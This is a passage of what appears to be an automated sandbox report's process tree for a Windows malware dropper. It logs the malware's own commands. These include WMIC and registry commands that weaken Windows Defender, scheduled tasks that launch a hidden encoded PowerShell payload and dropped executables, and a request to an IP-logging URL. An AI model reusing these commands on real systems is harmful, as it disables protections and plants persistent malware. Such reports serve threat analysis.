                                                                                                                                                                  • C:\Users\Admin\Documents\Z3vbiNX3x3VyCc97mwBHjyOl.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\Z3vbiNX3x3VyCc97mwBHjyOl.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:6584
                                                                                                                                                                      • C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:6120
                                                                                                                                                                          • C:\Users\Admin\Documents\XGj3jmKQB2LbpfbonR3MoaYo.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\XGj3jmKQB2LbpfbonR3MoaYo.exe"
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:6244
                                                                                                                                                                          • C:\Users\Admin\Documents\g_r7Y0aikAhwSnX2OLFkr7Rb.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\g_r7Y0aikAhwSnX2OLFkr7Rb.exe"
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:1220
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS2234.tmp\Install.exe
                                                                                                                                                                                .\Install.exe
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:6216
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS261C.tmp\Install.exe
                                                                                                                                                                                    .\Install.exe /S /site_id "668658"
                                                                                                                                                                                    10⤵
                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                    PID:5140
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:4964
                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                          forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                          12⤵
                                                                                                                                                                                            PID:4072
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                              13⤵
                                                                                                                                                                                                PID:4548
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                    PID:1516
                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                        PID:6788
                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                    PID:6920
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                        PID:4448
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                            PID:6156
                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                PID:6644
                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                            PID:3608
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                PID:4420
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                    PID:5560
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                        PID:1204
                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                    PID:6768
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                        PID:3416
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                            PID:912
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                PID:1496
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                          PID:3664
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                              PID:6196
                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                  PID:5280
                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                    PID:3772
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                  PID:5940
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                      PID:4000
                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                          PID:1172
                                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                            PID:1716
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /CREATE /TN "gZuDyUGRa" /SC once /ST 01:41:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                        PID:4496
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 02:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\QoLrRZf.exe\" W8 /site_id 668658 /S" /V1 /F
                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                        PID:3324
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\M89xiQWD4jToE70RjpKHipAN.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\M89xiQWD4jToE70RjpKHipAN.exe"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:7156
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 252
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                      PID:5488
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:5864
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:2888
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\Z7AtOxxAa0A9M6sgTHOWTPRU.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Documents\Z7AtOxxAa0A9M6sgTHOWTPRU.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                PID:6576
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\4aKuMb15eVCAXwQh0zYWXny4.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Documents\4aKuMb15eVCAXwQh0zYWXny4.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:6568
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 260
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                    PID:4604
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\3D8cjcpmFezxcTMQWvs7d04F.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\3D8cjcpmFezxcTMQWvs7d04F.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:6560
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\YtUMd8wkc4HgU5XaH0XlhSqB.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\YtUMd8wkc4HgU5XaH0XlhSqB.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                  PID:6552
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\ijJ98LSvdTwAgFv91iPL1m9r.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\ijJ98LSvdTwAgFv91iPL1m9r.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:6544
                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\ijJ98LSvdTwAgFv91iPL1m9r.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\ijJ98LSvdTwAgFv91iPL1m9r.exe"
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                      PID:6912
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\Z30ARu8DAEhsapqpA3UQ8PbV.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\Z30ARu8DAEhsapqpA3UQ8PbV.exe"
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    PID:6712
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:716
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\f.exe
                                                                                                                                                                                                                                          "f.exe"
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:6004
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\wwl.exe
                                                                                                                                                                                                                                            "wwl.exe"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                            PID:5368
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                            PID:6624
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\wwi.exe
                                                                                                                                                                                                                                            "wwi.exe"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                            PID:5408
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\tgvGR3ohPnk45OZ6IGm1pqy5.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\tgvGR3ohPnk45OZ6IGm1pqy5.exe"
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                        PID:6884
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\8OO3xwle7VGlFFfY0gVtUM4f.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\8OO3xwle7VGlFFfY0gVtUM4f.exe"
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:1676
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7433125.scr
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7433125.scr" /S
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                            PID:5972
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\7085151.scr
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\7085151.scr" /S
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                            PID:5708
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\3552438.scr
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\3552438.scr" /S
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                            PID:6280
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Sun06f07d4ec3d1.exe
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:1628
                                                                                                                                                                                                                                • C:\Windows\System32\sihclient.exe
                                                                                                                                                                                                                                  C:\Windows\System32\sihclient.exe /cv qZIHR0hrq02NvNbKVX1Y/g.0.2
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                  PID:3776
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun06f07d4ec3d1.exe
                                                                                                                                                                                                                                  Sun06f07d4ec3d1.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5172
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5012 -ip 5012
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                  PID:5600
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3912 -ip 3912
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                  PID:5896
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3880 -ip 3880
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                  PID:5928
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1304 -ip 1304
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                  PID:6020
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                  PID:6084
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 460
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:5308
                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                  PID:6072
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 6084 -ip 6084
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:5864
                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:6256
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3224 -ip 3224
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:2064
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5740 -ip 5740
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                      PID:5300
                                                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 352 -p 4624 -ip 4624
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                      PID:5908
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5944 -ip 5944
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                      PID:7160
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 7068 -ip 7068
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                      PID:6904
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 6244 -ip 6244
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                      PID:6616
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6268 -ip 6268
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                      PID:2416
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 6568 -ip 6568
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                      PID:5824
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 6256 -ip 6256
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                      PID:5188
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                      1⤵
